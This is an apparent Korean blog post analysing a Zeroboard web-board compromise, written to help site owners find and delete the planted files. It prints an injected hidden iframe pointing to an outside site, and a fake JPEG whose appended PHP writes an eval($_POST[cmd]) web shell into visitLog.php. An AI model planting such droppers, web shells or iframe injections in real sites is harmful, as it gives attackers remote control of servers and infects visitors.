annyoung

ro521.com/test.htm 제로보드 침해사고 본문

분석생활

ro521.com/test.htm 제로보드 침해사고

nopsled 2015. 11. 25. 03:58



<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe> 

제로보드를 사용중인데 이 녀석이 나타난다면 감염되는 이유는 단 한 가지다. 인터넷을 찾아 보니 그누보드, 제로보드 모두 다 Mass SQL Injection을 당했다고 한다.


/bbs/icon/ 경로에 group_qazwsxedc.jpg, visitLog.php 이 두녀석이 있을꺼다.

꼭 삭제 해주자. 웹쉘이다.



���JFIF``��C

��C ��
"��
���}!1AQa"q2걨�#B굽R蘭$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz깂뀊뇠뎷뮄뵓뼏삕슓$ⅵ㎤ø껙뉘떱많봔쳐탬픽�錄桐虜妹伴栒鴨鉛僥揄膣逮擢票��
���w!1AQaq"2�B몼굽 #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz굛꼨냷닀뒕뱮븭뿕솞∀ㄵ├Łげ낫독렇뭔쩠컵판훔杆戇倆厘描栒鴨鉛僥攸彩充坂沆��?�M쥓*�?��<?php
$logFileHandle = fopen("./icon/visitLog.php", "x+");
$logContent = "<?php eval(\$_POST[cmd]);?>";
fwrite($logFileHandle,$logContent);
fclose($logFileHandle);
echo getcwd();
?>



group_qazwsxedc.jpg를 보면 생긴건 JFIF를 포맷을 가진 이미지처럼 보이지만, 뒤에는 웹쉘에 사용될 문자열들이 있다.


visitLog.php는 cmd에 받은 내용을 php로 저장한다.



참고자료 : http://blog.pages.kr/928

Comments